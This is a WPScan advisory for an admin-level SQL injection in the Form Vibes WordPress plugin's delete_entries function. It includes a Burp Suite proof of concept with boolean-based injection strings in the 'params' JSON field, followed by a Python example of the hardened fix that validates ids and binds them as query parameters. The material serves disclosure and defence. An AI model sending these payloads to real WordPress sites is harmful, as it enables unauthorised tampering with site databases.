Source: wpvulndb (Nguyen Duy Quoc Khanh)
WPVDB-ID: 9D49DF6B-E2F1-4662-90D2-84C29C3B1CB0
History: Nov 08, 2022 - 12:00 a.m.

Form Vibes < 1.4.5 - Admin+ SQLi

2022-11-08 00:00:00
Nguyen Duy Quoc Khanh
wpscan.com
Tags: form vibes, sql injection, admin+, burp suite, contact form 7

EPSS: 0.001 (Low), percentile 19.5%

The "delete_entries" function does not sanitise the parameters it reads from the request before using them in a query. This leads to an SQL Injection vulnerability.

PoC

- Create a submission using the Contact Form 7 plugin.
- On the Form Vibes tab in the dashboard, click "submissions" and use the delete function on an entry.
- Intercept the request and send it to Repeater in Burp Suite.
- Change the parameter "params" to: {"ids":["9) AND (1=2);-- -"]}
- Send the request; we get this response: {"status":"failed","message":"Could not able to delete Entries"}
- Change the parameter "params" to: {"ids":["9) AND (1=1);-- -"]}
- Send the request; the response this time is the following: {"status":"passed","message":"Entries Deleted"}
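The boolean conditions above work because the "ids" values from the "params" JSON reach the DELETE query as raw text. The following added example (not the plugin's code; the plugin is PHP, this uses Python with sqlite3 to show the pattern) handles the same request shape the hardened way: every id is validated as a plain integer and bound as a query parameter, so a value like "9) AND (1=1);-- -" is rejected before any SQL is built. The table name "entries", the function names and the sample rows are assumptions.

```python
import json
import re
import sqlite3
from typing import List, Tuple

# Constructed request bodies in the shape the advisory shows (not captured traffic).
LEGIT_PARAMS = '{"ids":["9","12"]}'
PROBE_PARAMS = '{"ids":["9) AND (1=1);-- -"]}'

_INT_RE = re.compile(r"^[1-9][0-9]*$")  # strict decimal ids only, no signs or spaces


def parse_ids(params_json: str) -> List[int]:
    """Return the 'ids' list as ints; anything that is not a plain integer is refused."""
    data = json.loads(params_json)
    ids = data.get("ids") if isinstance(data, dict) else None
    if not isinstance(ids, list) or not ids:
        raise ValueError("ids must be a non-empty list")
    clean = []
    for raw in ids:
        text = str(raw)
        if not _INT_RE.match(text):  # rejects "9) AND (1=1);-- -" and similar
            raise ValueError(f"rejected non-integer id: {text!r}")
        clean.append(int(text))
    return clean


def build_delete(ids: List[int]) -> Tuple[str, Tuple[int, ...]]:
    """Parameterised DELETE: one '?' per id, values bound separately from the SQL text."""
    placeholders = ",".join("?" * len(ids))
    return f"DELETE FROM entries WHERE id IN ({placeholders})", tuple(ids)


def delete_entries(conn: sqlite3.Connection, params_json: str) -> int:
    """Hardened delete handler (assumed name); returns the number of rows removed."""
    sql, args = build_delete(parse_ids(params_json))
    cur = conn.execute(sql, args)
    conn.commit()
    return cur.rowcount


def make_db() -> sqlite3.Connection:
    """In-memory 'entries' table with a few constructed submissions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (id INTEGER PRIMARY KEY, form TEXT)")
    conn.executemany("INSERT INTO entries VALUES (?, ?)",
                     [(9, "contact"), (10, "contact"), (12, "quote")])
    conn.commit()
    return conn
```

Running delete_entries(make_db(), LEGIT_PARAMS) removes two rows, while PROBE_PARAMS raises ValueError before any query is executed.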

CPE Name   | Operator | Version
form-vibes | lt       | 1.4.6
